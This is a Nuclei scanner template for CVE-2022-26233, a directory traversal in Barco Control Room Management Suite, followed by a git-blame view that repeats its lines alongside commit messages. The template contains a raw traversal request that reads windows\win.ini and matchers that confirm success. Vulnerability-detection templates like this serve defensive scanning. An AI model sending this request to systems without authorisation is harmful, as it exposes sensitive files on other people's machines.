nuclei-templates/cves/2022/CVE-2022-26233.yaml

id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  reference:
    - https://0day.today/exploit/37579
    - https://www.cvedetails.com/cve/CVE-2022-26233
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
  tags: cve,cve2022,barco,lfi

requests:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`id: CVE-2022-26233`

			`info:`
			`name: Barco Control Room Management Suite - Directory Traversal`
			`author: 0x_Akoko`
			`severity: high`
			`description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.`
			`reference:`
			`- https://0day.today/exploit/37579`
			`- https://www.cvedetails.com/cve/CVE-2022-26233`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- http://seclists.org/fulldisclosure/2022/Apr/0`
			`- http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`cvss-score: 7.5`
			`cve-id: CVE-2022-26233`
			`cwe-id: CWE-22`
			`tags: cve,cve2022,barco,lfi`

			`requests:`
Update and rename CVE-2022-26233.yaml to cves/2022/CVE-2022-26233.yaml 2022-05-07 10:18:02 +00:00			`- raw:`
			`- \|+`
			`GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1`
			`Host: {{Hostname}}`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00
Update and rename CVE-2022-26233.yaml to cves/2022/CVE-2022-26233.yaml 2022-05-07 10:18:02 +00:00			`unsafe: true`
Create CVE-2022-26233.yaml 2022-05-05 01:55:44 +00:00			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "bit app support"`
			`- "fonts"`
			`- "extensions"`
			`condition: and`